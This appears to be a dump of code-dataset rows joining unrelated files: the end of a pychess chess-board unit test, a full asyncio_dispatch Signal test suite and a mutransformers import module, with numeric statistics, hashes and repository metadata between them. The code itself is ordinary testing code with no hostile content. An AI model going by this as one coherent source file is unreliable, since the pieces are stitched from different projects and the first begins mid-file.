board = pychess.board.SetupBoard('4k3/pppppppp/8/8/8/8/PPPPPPPP/4K3 w - - 0 1')
str_board = pychess.util.board.to_string_array(board)
self.assertEqual(str_board, ['....k...',
'pppppppp',
'........',
'........',
'........',
'........',
'PPPPPPPP',
'....K...'
])
def test_setup_position_missing_King(self):
with self.assertRaises(ValueError):
board = pychess.board.SetupBoard('4k3/pppppppp/8/8/8/8/PPPPPPPP/8 w - - 0 1')
def test_put_piece(self):
board = pychess.board.SetupBoard('4k3/pppppppp/8/8/8/8/PPPPPPPP/4K3 w KQkq - 0 1')
color = pychess.PieceColor.WHITE
first_rank = board.get_first_rank(color)
board.put_piece(pychess.pieces.Rook(board, (0, first_rank), color))
board.put_piece(pychess.pieces.Knight(board, (1, first_rank), color))
board.put_piece(pychess.pieces.Bishop(board, (2, first_rank), color))
board.put_piece(pychess.pieces.Queen(board, (3, first_rank), color))
board.put_piece(pychess.pieces.Bishop(board, (5, first_rank), color))
board.put_piece(pychess.pieces.Knight(board, (6, first_rank), color))
board.put_piece(pychess.pieces.Rook(board, (7, first_rank), color))
color = pychess.PieceColor.BLACK
first_rank = board.get_first_rank(color)
board.put_piece(pychess.pieces.Rook(board, (0, first_rank), color))
board.put_piece(pychess.pieces.Knight(board, (1, first_rank), color))
board.put_piece(pychess.pieces.Bishop(board, (2, first_rank), color))
board.put_piece(pychess.pieces.Queen(board, (3, first_rank), color))
board.put_piece(pychess.pieces.Bishop(board, (5, first_rank), color))
board.put_piece(pychess.pieces.Knight(board, (6, first_rank), color))
board.put_piece(pychess.pieces.Rook(board, (7, first_rank), color))
str_board = pychess.util.board.to_string_array(board)
self.assertEqual(str_board, ['rnbqkbnr',
'pppppppp',
'........',
'........',
'........',
'........',
'PPPPPPPP',
'RNBQKBNR'
])
self.assertEqual(1, 1)
def test_put_piece_too_many_Kings(self):
board = pychess.board.SetupBoard()
board.put_piece(pychess.pieces.King(board, (0, 0), pychess.PieceColor.WHITE))
board.put_piece(pychess.pieces.King(board, (7, 7), pychess.PieceColor.BLACK))
with self.assertRaises(ValueError):
# putting one too many pychess.pieces.Kings on the board should raise an Error
board.put_piece(pychess.pieces.King(board, (7, 0), pychess.PieceColor.WHITE))
def test_put_piece_Kings_too_close(self):
board = pychess.board.SetupBoard()
board.put_piece(pychess.pieces.King(board, (0, 0), pychess.PieceColor.WHITE))
with self.assertRaises(ValueError):
# putting one a pychess.pieces.King to close to the other one should raise an Error
board.put_piece(pychess.pieces.King(board, (0, 1), pychess.PieceColor.BLACK))
def test_put_piece_missing_King(self):
with self.assertRaises(ValueError):
# forgetting one pychess.pieces.King should raise an Error
board = pychess.board.SetupBoard('4k3/pppppppp/8/8/8/8/PPPPPPPP/8 w KQkq - 0 1')
print(pychess.util.board.to_string_array(board))
def test_put_piece_Pawn_on_last_rank(self):
board = pychess.board.SetupBoard()
with self.assertRaises(ValueError):
# putting one a pychess.pieces.Pawn on its respective last rank should raise an Error
board.put_piece(pychess.pieces.Pawn(board, (0, board.get_last_rank(pychess.PieceColor.WHITE)),
pychess.PieceColor.WHITE))
def test_put_piece_occupied(self):
board = pychess.board.SetupBoard('rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1')
with self.assertRaises(ValueError):
# putting one a pychess.pieces.Pawn on its respective last rank should raise an Error
board.put_piece(pychess.pieces.Pawn(board, (0, 0), pychess.PieceColor.WHITE))
def test_Pawn_en_passant_setup_wP(self):
board = pychess.board.SetupBoard('rnbqkbnr/pppp1ppp/8/3PpP2/8/8/PPP2PPP/RNBQKBNR w KQkq e6')
pawns = board.get_pawns(pychess.PieceColor.WHITE)
moves = []
for p in pawns:
for m in p.moves():
moves.append(m.to_algebraic())
en_passant_moves = ['dxe6', 'fxe6']
en_passants_found = []
for em in en_passant_moves:
if em in moves:
en_passants_found.append(em)
self.assertCountEqual(en_passant_moves, en_passants_found)
def test_Pawn_en_passant_setup_bP(self):
board = pychess.board.SetupBoard('rnbqkbnr/ppp1p1pp/8/8/3pPp2/8/PPPP1PPP/RNBQKBNR b KQkq e3')
pawns = board.get_pawns(pychess.PieceColor.BLACK)
moves = []
for p in pawns:
for m in p.moves():
moves.append(m.to_algebraic())
en_passant_moves = ['dxe3', 'fxe3']
en_passants_found = []
for em in en_passant_moves:
if em in moves:
en_passants_found.append(em)
self.assertCountEqual(en_passant_moves, en_passants_found)
def test_corrupt_fen_1(self):
with self.assertRaises(ValueError):
board = pychess.board.SetupBoard('rnbqkbnr/pppppppp/8/8/8/8/PPPPPPP')
def test_corrupt_fen_2(self):
with self.assertRaises(ValueError):
board = pychess.board.SetupBoard('rnbqkbnr/ppp1p1pp/8/8/3pPp2/8/PPPP1PPP/RNBQKBNR ? KQkq e3')
def test_corrupt_fen_3(self):
with self.assertRaises(ValueError):
board = pychess.board.SetupBoard('rnbqkbnr/ppp1p1pp/8/8/3pPp2/8/PPPP1PPP/RNBQKBNR w KQkq A3')
def test_corrupt_fen_4(self):
with self.assertRaises(ValueError):
board = pychess.board.SetupBoard('rnbqkbnr/ppp1p1pp/8/8/3pPp2/8/PPPP1PPP/RNBQKBNR w KQkq ??')
def test_corrupt_fen_5(self):
with self.assertRaises(ValueError):
board = pychess.board.SetupBoard('rnbqkbnr/ppp1p1pp/8/8/3p1p2/8/PPPPPPPP/RNBQKBNR b KQkq e3')
def test_corrupt_fen_6(self):
with self.assertRaises(ValueError):
board = pychess.board.SetupBoard('rnbqkbnr/ppp1p1pp/8/8/3pNp2/8/PPPP1PPP/RNBQKBNR b KQkq e3')
def test_corrupt_fen_7(self):
with self.assertRaises(ValueError):
board = pychess.board.SetupBoard('rnbqkbnr/ppp1p1pp/8/8/3ppp2/8/PPPP1PPP/RNBQKBNR b KQkq e3')
if __name__ == '__main__':
unittest.main()
| 43.882845 | 106 | 0.516114 | 1,092 | 10,488 | 4.778388 | 0.123626 | 0.011499 | 0.071675 | 0.113837 | 0.847068 | 0.821388 | 0.768494 | 0.732656 | 0.713108 | 0.686853 | 0 | 0.030573 | 0.357551 | 10,488 | 238 | 107 | 44.067227 | 0.743841 | 0.041095 | 0 | 0.653846 | 0 | 0 | 0.142118 | 0.075936 | 0 | 0 | 0 | 0 | 0.126374 | 1 | 0.120879 | false | 0.065934 | 0.010989 | 0 | 0.137363 | 0.005495 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
4056cd12b46db2f8f3b752ac7d52c6b515bb92f2 | 27,587 | py | Python | asyncio_dispatch/tests/test_dispatcher.py | lenzenmi/asyncio_dispatch | 9c8e7fba65c69ba146e6559ec7897bdadb24880a | [
"MIT"
] | 21 | 2016-03-11T17:56:07.000Z | 2021-07-18T13:43:37.000Z | asyncio_dispatch/tests/test_dispatcher.py | cfhamlet/asyncio_dispatch | 9c8e7fba65c69ba146e6559ec7897bdadb24880a | [
"MIT"
] | 1 | 2015-11-12T11:37:54.000Z | 2015-11-12T11:37:54.000Z | asyncio_dispatch/tests/test_dispatcher.py | cfhamlet/asyncio_dispatch | 9c8e7fba65c69ba146e6559ec7897bdadb24880a | [
"MIT"
] | 3 | 2015-11-12T11:29:32.000Z | 2019-03-15T03:31:06.000Z | '''
Created on Apr 23, 2015
@author: mike
'''
import unittest
from unittest.mock import Mock
import asyncio
import gc
from .helpers import FunctionMock, CoroutineMock
from ..dispatcher import Signal
class TestSignal(unittest.TestCase):
def setUp(self):
self.loop = asyncio.get_event_loop()
def tearDown(self):
pass
def test_connect_send_all_no_args(self):
callback = FunctionMock()
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback)),
self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(tasks[1].result(), 1)
self.assertEqual(len(signal._all), 1)
self.assertEqual(len(signal._by_keys), 0)
self.assertEqual(len(signal._by_senders), 0)
callback.assert_called_with(signal=signal, senders=set(), keys=set())
def test_connect_send_all_no_args_multiple(self):
callbacks = [FunctionMock(), FunctionMock(), FunctionMock(), FunctionMock()]
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callbacks[0])),
self.loop.create_task(signal.connect(callbacks[1])),
self.loop.create_task(signal.connect(callbacks[2])),
self.loop.create_task(signal.connect(callbacks[3])),
self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(tasks[4].result(), 4)
self.assertEqual(len(signal._all), 4)
self.assertEqual(len(signal._by_keys), 0)
self.assertEqual(len(signal._by_senders), 0)
for callback in callbacks:
callback.assert_called_with(signal=signal, senders=set(), keys=set())
self.assertEqual(callback.call_count, 1)
def test_dissconnect_all_no_args_multiple(self):
callbacks = [FunctionMock(), FunctionMock(), FunctionMock(), FunctionMock()]
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callbacks[0])),
self.loop.create_task(signal.connect(callbacks[1])),
self.loop.create_task(signal.connect(callbacks[2])),
self.loop.create_task(signal.connect(callbacks[3])),
self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(tasks[4].result(), 4)
self.assertEqual(len(signal._all), 4)
self.assertEqual(len(signal._by_keys), 0)
self.assertEqual(len(signal._by_senders), 0)
for callback in callbacks:
callback.assert_called_with(signal=signal, senders=set(), keys=set())
self.assertEqual(callback.call_count, 1)
tasks = [signal.disconnect(callbacks[0])]
self.loop.run_until_complete(asyncio.wait(tasks))
# Order is important
tasks = [self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
for callback in callbacks[1:]:
callback.assert_called_with(signal=signal, senders=set(), keys=set())
self.assertEqual(callback.call_count, 2)
self.assertEqual(callbacks[0].call_count, 1)
def test_weakref_all_no_args_multiple(self):
fn1 = FunctionMock()
fn2 = FunctionMock()
fn3 = FunctionMock()
fn4 = FunctionMock()
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(fn1)),
self.loop.create_task(signal.connect(fn2)),
self.loop.create_task(signal.connect(fn3)),
self.loop.create_task(signal.connect(fn4)),
self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(len(signal._all), 4)
del(fn1)
gc.collect()
# cleanup happens during disconnect and send only.
tasks = [self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(len(signal._all), 3)
def test_strongref_all_no_args_multiple(self):
fn1 = FunctionMock()
fn2 = FunctionMock()
fn3 = FunctionMock()
fn4 = FunctionMock()
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(fn1, weak=False)),
self.loop.create_task(signal.connect(fn2)),
self.loop.create_task(signal.connect(fn3)),
self.loop.create_task(signal.connect(fn4)),
self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(len(signal._all), 4)
del(fn1)
gc.collect()
# Should not be garbage collected
tasks = [self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(len(signal._all), 4)
def test_send_all_with_args_default(self):
callback = FunctionMock()
kwargs = {'arg1': 1, 'arg2': 2}
signal = Signal(loop=self.loop, **kwargs)
tasks = [self.loop.create_task(signal.connect(callback)),
self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(tasks[1].result(), 1)
self.assertEqual(len(signal._all), 1)
self.assertEqual(len(signal._by_keys), 0)
self.assertEqual(len(signal._by_senders), 0)
callback.assert_called_with(signal=signal, senders=set(), keys=set(), arg1=1, arg2=2)
def test_send_all_with_args_changed(self):
callback = FunctionMock()
kwargs = {'arg1': 1, 'arg2': 2}
signal = Signal(loop=self.loop, **kwargs)
tasks = [self.loop.create_task(signal.connect(callback)),
# change the kwargs when run
self.loop.create_task(signal.send(arg1=2, arg2=3))]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(tasks[1].result(), 1)
self.assertEqual(len(signal._all), 1)
self.assertEqual(len(signal._by_keys), 0)
self.assertEqual(len(signal._by_senders), 0)
callback.assert_called_with(signal=signal, senders=set(), keys=set(), arg1=2, arg2=3)
def test_send_all_with_args_wrong(self):
callback = FunctionMock()
kwargs = {'arg1': 1, 'arg2': 2}
signal = Signal(loop=self.loop, **kwargs)
tasks = [self.loop.create_task(signal.connect(callback)),
# change the kwargs when run
self.loop.create_task(signal.send(wrong_arg=2, arg2=3))]
coro = asyncio.wait(tasks)
self.loop.run_until_complete(coro)
# checking the result of the send task should raise ValueError
self.assertRaises(ValueError, tasks[1].result)
def test_send_sender_no_args(self):
callback = FunctionMock()
sender = object()
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback, sender=sender)),
self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertFalse(callback.called)
tasks = [self.loop.create_task(signal.send(sender=sender))]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(callback.call_count, 1)
def test_send_method_sender_no_args(self):
callback = FunctionMock()
class Test:
def method(self):
pass
instance = Test()
sender = instance.method
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback, sender=sender)),
self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertFalse(callback.called)
tasks = [self.loop.create_task(signal.send(sender=sender))]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(callback.call_count, 1)
def test_send_senders_no_args(self):
callback1 = FunctionMock()
callback2 = FunctionMock()
sender1 = object()
sender2 = object()
sender3 = object()
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback1, senders=[sender1])),
self.loop.create_task(signal.connect(callback2, senders=[sender2, sender3])),
self.loop.create_task(signal.send(sender=sender1))]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(callback1.call_count, 1)
self.assertEqual(callback2.call_count, 0)
tasks = [self.loop.create_task(signal.send(sender=sender2))]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(callback1.call_count, 1)
self.assertEqual(callback2.call_count, 1)
tasks = [self.loop.create_task(signal.send(senders=[sender2, sender3]))]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(callback1.call_count, 1)
self.assertEqual(callback2.call_count, 2)
tasks = [self.loop.create_task(signal.send(senders=[sender1, sender3]))]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(callback1.call_count, 2)
self.assertEqual(callback2.call_count, 3)
def test_send_key_no_args(self):
callback = FunctionMock()
key = 'some-key'
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback, key=key)),
self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertFalse(callback.called)
tasks = [self.loop.create_task(signal.send(key=key))]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(callback.call_count, 1)
def test_send_keys_no_args(self):
callback1 = FunctionMock()
callback2 = FunctionMock()
key1 = 'key1'
key2 = 'key2'
key3 = 'key3'
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback1, keys=[key1])),
self.loop.create_task(signal.connect(callback2, keys=[key2, key3])),
self.loop.create_task(signal.send(key=key1))]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(callback1.call_count, 1)
self.assertEqual(callback2.call_count, 0)
tasks = [self.loop.create_task(signal.send(key=key2))]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(callback1.call_count, 1)
self.assertEqual(callback2.call_count, 1)
tasks = [self.loop.create_task(signal.send(keys=[key2, key3]))]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(callback1.call_count, 1)
self.assertEqual(callback2.call_count, 2)
tasks = [self.loop.create_task(signal.send(keys=[key1, key3]))]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(callback1.call_count, 2)
self.assertEqual(callback2.call_count, 3)
def test_disconnect_all(self):
callback = FunctionMock()
key = 'some-key'
key2 = 'some-key2'
sender = object()
sender2 = object()
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback)),
self.loop.create_task(signal.connect(callback, sender=sender)),
self.loop.create_task(signal.connect(callback, senders=[sender, sender2])),
self.loop.create_task(signal.connect(callback, key=key)),
self.loop.create_task(signal.connect(callback, keys=[key, key2]))]
self.loop.run_until_complete(asyncio.wait(tasks))
# disconnect from all signals
tasks = [self.loop.create_task(signal.disconnect(callback))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
tasks = [self.loop.create_task(signal.send()),
self.loop.create_task(signal.send(sender=sender)),
self.loop.create_task(signal.send(senders=[sender, sender2])),
self.loop.create_task(signal.send(key=key)),
self.loop.create_task(signal.send(keys=[key, key2])), ]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertFalse(callback.called)
def test_disconnect_sender(self):
callback = FunctionMock()
key = 'some-key'
key2 = 'some-key2'
sender = object()
sender2 = object()
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback, sender=sender)),
self.loop.create_task(signal.connect(callback, senders=[sender, sender2])),
self.loop.create_task(signal.connect(callback, key=key)),
self.loop.create_task(signal.connect(callback, keys=[key, key2]))]
self.loop.run_until_complete(asyncio.wait(tasks))
# disconnect from all signals
tasks = [self.loop.create_task(signal.disconnect(callback, sender=sender))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
tasks = [self.loop.create_task(signal.send(sender=sender))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertFalse(callback.called)
tasks = [self.loop.create_task(signal.send(senders=[sender, sender2])),
self.loop.create_task(signal.send(key=key)),
self.loop.create_task(signal.send(keys=[key, key2]))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertEqual(callback.call_count, 3)
def test_disconnect_senders(self):
callback = FunctionMock()
key = 'some-key'
key2 = 'some-key2'
sender = object()
sender2 = object()
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback, sender=sender)),
self.loop.create_task(signal.connect(callback, senders=[sender, sender2])),
self.loop.create_task(signal.connect(callback, key=key)),
self.loop.create_task(signal.connect(callback, keys=[key, key2]))]
self.loop.run_until_complete(asyncio.wait(tasks))
# disconnect from all signals
tasks = [self.loop.create_task(signal.disconnect(callback, senders=[sender]))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
tasks = [self.loop.create_task(signal.send(sender=sender))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertFalse(callback.called)
tasks = [self.loop.create_task(signal.send(senders=[sender, sender2])),
self.loop.create_task(signal.send(key=key)),
self.loop.create_task(signal.send(keys=[key, key2]))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertEqual(callback.call_count, 3)
def test_disconnect_key(self):
callback = FunctionMock()
key = 'some-key'
key2 = 'some-key2'
sender = object()
sender2 = object()
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback, sender=sender)),
self.loop.create_task(signal.connect(callback, senders=[sender, sender2])),
self.loop.create_task(signal.connect(callback, key=key)),
self.loop.create_task(signal.connect(callback, keys=[key, key2]))]
self.loop.run_until_complete(asyncio.wait(tasks))
# disconnect from all signals
tasks = [self.loop.create_task(signal.disconnect(callback, key=key))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
tasks = [self.loop.create_task(signal.send(key=key))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertFalse(callback.called)
tasks = [self.loop.create_task(signal.send(senders=[sender, sender2])),
self.loop.create_task(signal.send(sender=sender)),
self.loop.create_task(signal.send(keys=[key, key2]))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertEqual(callback.call_count, 3)
def test_disconnect_keys(self):
callback = FunctionMock()
key = 'some-key'
key2 = 'some-key2'
sender = object()
sender2 = object()
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback, sender=sender)),
self.loop.create_task(signal.connect(callback, senders=[sender, sender2])),
self.loop.create_task(signal.connect(callback, key=key)),
self.loop.create_task(signal.connect(callback, keys=[key, key2]))]
self.loop.run_until_complete(asyncio.wait(tasks))
# disconnect from all signals
tasks = [self.loop.create_task(signal.disconnect(callback, keys=[key]))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
tasks = [self.loop.create_task(signal.send(key=key))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertFalse(callback.called)
tasks = [self.loop.create_task(signal.send(senders=[sender, sender2])),
self.loop.create_task(signal.send(sender=sender)),
self.loop.create_task(signal.send(keys=[key, key2]))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertEqual(callback.call_count, 3)
def test_weakref_sender(self):
callback = FunctionMock()
sender = object()
sender2 = object()
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback, senders=[sender, sender2]))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
# delete and do garbage cleanup
del(callback)
gc.collect()
# tasks are pruned during a send
tasks = [self.loop.create_task(signal.send(senders=[sender, sender2]))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertEqual(len(signal._by_senders), 0)
self.assertEqual(len(signal._locks_senders), 0)
def test_weakref_keys(self):
callback = FunctionMock()
key = 'key1'
key2 = 'key2'
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback, keys=[key, key2]))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
# delete and do garbage cleanup
del(callback)
gc.collect()
# tasks are pruned during a send
tasks = [self.loop.create_task(signal.send(keys=[key, key2]))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertEqual(len(signal._by_keys), 0)
self.assertEqual(len(signal._locks_keys), 0)
def test_send_method(self):
class Test:
call_count = 0
def method(self, *args, **kwargs):
self.call_count += 1
instance = Test()
callback = instance.method
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
tasks = [self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertEqual(instance.call_count, 1)
def test_send_coro(self):
coro_callback = CoroutineMock()
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(coro_callback))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
tasks = [self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertEqual(coro_callback.call_count, 1)
def test_send_coro_args(self):
coro_callback = CoroutineMock()
kwargs = {'arg1': 1, 'arg2': 2}
signal = Signal(loop=self.loop, **kwargs)
tasks = [self.loop.create_task(signal.connect(coro_callback))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
tasks = [self.loop.create_task(signal.send(**kwargs))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertEqual(coro_callback.call_count, 1)
coro_callback.assert_called_with(signal=signal, keys=set(), senders=set(),
**kwargs)
def test_send_method_coro(self):
class Test:
call_count = 0
@asyncio.coroutine
def method(self, *args, **kwargs):
self.call_count += 1
instance = Test()
coro_callback = instance.method
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(coro_callback))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
tasks = [self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertEqual(instance.call_count, 1)
def test_exception(self):
# test that our exception is being raised
exception_handler = Mock()
self.loop.set_exception_handler(exception_handler)
callback = FunctionMock()
callback.side_effect = Exception('BOOM!')
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
tasks = [self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertTrue(callback.called)
self.assertTrue(exception_handler.called)
# reset our exception handler
self.loop.set_exception_handler(None)
def test_exception_coro(self):
# test that our exception is being raised
exception_handler = Mock()
self.loop.set_exception_handler(exception_handler)
callback_coro = CoroutineMock()
callback_coro.side_effect = Exception('BOOM!')
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback_coro))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
tasks = [self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertTrue(callback_coro.called)
self.assertTrue(exception_handler.called)
# reset our exception handler
self.loop.set_exception_handler(None)
def test_static_method(self):
# test that our exception is being raised
count = 0
class Test:
@staticmethod
def method(*args, **kwargs):
nonlocal count
count += 1
callback = Test.method
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
tasks = [self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertEqual(count, 1)
def test_static_method_coro(self):
# test that our exception is being raised
count = 0
class Test:
@staticmethod
@asyncio.coroutine
def method(*args, **kwargs):
nonlocal count
count += 1
callback = Test.method
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
tasks = [self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertEqual(count, 1)
def test_class_method(self):
# test that our exception is being raised
class Test:
count = 0
@classmethod
def method(cls, *args, **kwargs):
cls.count += 1
callback = Test.method
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
tasks = [self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertEqual(Test.count, 1)
def test_class_method_coro(self):
# test that our exception is being raised
class Test:
count = 0
@classmethod
@asyncio.coroutine
def method(cls, *args, **kwargs):
cls.count += 1
callback = Test.method
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback))]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
tasks = [self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
for task in tasks:
task.result()
self.assertEqual(Test.count, 1)
def test_restricted_keywords(self):
keywords = ('callback', 'key', 'keys', 'sender', 'senders', 'weak')
for key in keywords:
kwargs = {key: 'value'}
self.assertRaises(ValueError, Signal, **kwargs)
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| 31.929398 | 94 | 0.620256 | 3,279 | 27,587 | 5.069533 | 0.046966 | 0.109246 | 0.103591 | 0.133189 | 0.91975 | 0.908681 | 0.890152 | 0.870601 | 0.86645 | 0.865488 | 0 | 0.011796 | 0.259434 | 27,587 | 863 | 95 | 31.966396 | 0.80186 | 0.031029 | 0 | 0.810619 | 0 | 0 | 0.007491 | 0 | 0 | 0 | 0 | 0 | 0.148673 | 1 | 0.070796 | false | 0.00354 | 0.010619 | 0 | 0.095575 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4060e5583a1d8ddfe33161571e3252ed11cd4703 | 356 | py | Python | mutransformers/__init__.py | microsoft/mutransformers | 480287ce7b18a07a3432e8f2fbc0f0e5b71e2599 | [
"MIT"
] | 18 | 2022-03-08T23:16:09.000Z | 2022-03-31T10:31:25.000Z | mutransformers/__init__.py | microsoft/mutransformers | 480287ce7b18a07a3432e8f2fbc0f0e5b71e2599 | [
"MIT"
] | null | null | null | mutransformers/__init__.py | microsoft/mutransformers | 480287ce7b18a07a3432e8f2fbc0f0e5b71e2599 | [
"MIT"
] | 4 | 2022-03-10T01:38:21.000Z | 2022-03-31T10:31:27.000Z | from mutransformers.models.bert.modeling_bert import *
from mutransformers.models.bert.configuration_bert import *
from mutransformers.models.roberta.modeling_roberta import *
from mutransformers.models.roberta.configuration_roberta import *
from mutransformers.models.gpt2.modeling_gpt2 import *
